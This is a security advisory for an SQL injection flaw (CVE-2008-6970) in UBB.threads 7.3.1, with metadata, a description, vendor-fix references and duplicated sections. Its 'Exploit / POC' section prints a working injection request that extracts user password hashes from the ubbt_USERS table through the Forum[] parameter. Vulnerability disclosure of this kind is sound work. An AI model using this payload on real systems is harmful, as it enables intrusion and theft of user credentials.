UBB.threads 'Forum[]' Array SQL Injection Vulnerability
BID:31074
Info
UBB.threads 'Forum[]' Array SQL Injection Vulnerability
| Bugtraq ID: | 31074 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6970 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 02 2008 12:00AM |
| Updated: | Apr 16 2015 05:54PM |
| Credit: | James Bercegay |
| Vulnerable: |
Groupee UBB.threads 7.3.1 |
| Not Vulnerable: | |
Discussion
UBB.threads 'Forum[]' Array SQL Injection Vulnerability
UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects UBB.threads 7.3.1 (released before September 2, 2008) and prior versions.
UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects UBB.threads 7.3.1 (released before September 2, 2008) and prior versions.
Exploit / POC
UBB.threads 'Forum[]' Array SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example request is available:
ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*
Attackers can use a browser to exploit this issue.
The following example request is available:
ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*
Solution / Fix
UBB.threads 'Forum[]' Array SQL Injection Vulnerability
Solution:
The vendor has released fixes. Please see the references for more information.
Solution:
The vendor has released fixes. Please see the references for more information.
References
UBB.threads 'Forum[]' Array SQL Injection Vulnerability
References:
References:
- Security Patch released for all 7.x versions (Groupee)
- UBB.threads Homepage (Groupee)
- UBB.threads <= 7.3.1 SQL Injection (GulfTech Research And Development)